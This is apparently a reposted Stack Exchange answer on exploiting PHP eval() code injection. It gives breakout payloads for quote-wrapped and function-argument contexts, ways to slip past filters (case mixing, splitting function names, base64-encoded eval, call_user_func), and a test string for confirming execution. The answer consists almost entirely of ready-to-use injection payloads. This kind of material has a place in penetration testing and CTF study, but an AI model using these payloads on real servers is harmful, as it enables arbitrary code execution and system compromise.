PHP安全:尝试"); phpinfo()无效,如何突破eval()执行任意代码?
Let’s walk through why your initial "); phpinfo() attempt failed and how to adapt to common filtering or context constraints:
First, Map the Input Context
The biggest reason your payload didn’t work is almost certainly that your user input is wrapped in extra syntax inside the eval() call. Let’s break down common scenarios:
If the backend code looks like this (single-quote wrapping):
$payload = $_GET['input']; eval("echo '$payload';");Your
"); phpinfo()becomesecho '"); phpinfo();'—the unclosed single quote breaks the syntax. Fix this by closing the single quote first, then injecting your code and commenting out the leftover syntax:'; phpinfo(); //This turns the eval’d code into
echo ''; phpinfo(); //';—the//silences the trailing quote that would otherwise cause errors.If the input is wrapped in double quotes:
eval("echo \"$payload\";");Your original payload is closer, but tweak it to comment out the remaining double quote:
"; phpinfo(); //
Bypass Common Filtering Rules
If the target is blocking keywords like phpinfo or characters like (), try these workarounds:
- Case mixing: PHP function names are case-insensitive, so
PhPiNfO()might slip past basic keyword filters. - String concatenation: Split forbidden terms into chunks to avoid detection:
'; $a="php"; $b="info"; $a.$b(); // - Encoded payloads: Encode your code and decode it at runtime. For
phpinfo();, the base64 string iscGhwaW5mbygpOw==—use this payload:'; eval(base64_decode("cGhwaW5mbygpOw==")); // - Alternative function calls: Use
call_user_func('phpinfo')instead of direct invocation—this can bypass filters that target()immediately after keywords.
Validate with a Simple Test First
Before jumping to phpinfo(), confirm your payload syntax works with a trivial test:
'; echo "PAYLOAD WORKED"; //
If you see "PAYLOAD WORKED" output, you know your context and filtering bypass are correct—then swap in more complex code.
Edge Cases to Account For
- If your input is inside a function argument (e.g.,
eval("process_data($payload);")), use1); phpinfo(); //to close the argument and inject your code. - If whitespace is filtered, remove spaces entirely:
';phpinfo();//
内容的提问来源于stack exchange,提问作者R00t_R3z

